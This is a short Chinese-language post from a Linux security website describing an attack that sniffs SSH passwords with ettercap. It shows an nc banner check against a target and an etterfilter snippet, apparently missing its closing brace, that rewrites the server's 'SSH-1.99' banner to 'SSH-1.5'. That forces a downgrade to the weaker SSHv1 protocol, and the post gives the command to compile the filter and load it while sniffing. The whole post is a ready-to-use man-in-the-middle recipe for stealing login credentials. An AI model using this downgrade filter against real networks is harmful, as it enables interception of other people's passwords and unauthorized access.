Linux安全网 - Linux操作系统_Linux 命令_Linux教程_Linux黑客

会员投稿 投稿指南 本期推荐:
搜索:
您的位置: Linux安全网 > Linux安全 > » 正文

linux渗透:使用ettercap嗅探ssh口令

来源: 未知 分享至:

通常情况下我们判断目标的ssh能否被嗅探可以使用nc来确定。具体方法为nc targetip 22。

如果返回的版本号为SSH-1.99就表示在sshd_config中protcol 为2,1。

但默认从网上下的ettercap是不能嗅探ssh1的密码的,即使被嗅探的服务器被配置成了protcol 2,1也一样。


花了一会研究了下filter的写法,写了个ssh将ssh-1.99降到ssh-1.5的filter

 

  1. if (tcp.src ==22 && search(DATA.data,"SSH-1.99")){ 
  2.  
  3. replace("SSH-1.99","SSH-1.5"); 
  4.  

保存为sh.filter,编译方式为Etterfilter sh.filter -o sh.ef

启动ettercap的时候加载这个filter,看看,是不是能嗅了?


Tags: ettercap
分享至:
最新图文资讯
1 2 3 4 5 6
相关文章列表:
验证码:点击我更换图片 理智评论文明上网,拒绝恶意谩骂 用户名:
关于我们 - 联系我们 - 广告服务 - 友情链接 - 网站地图 - 版权声明 - 发展历史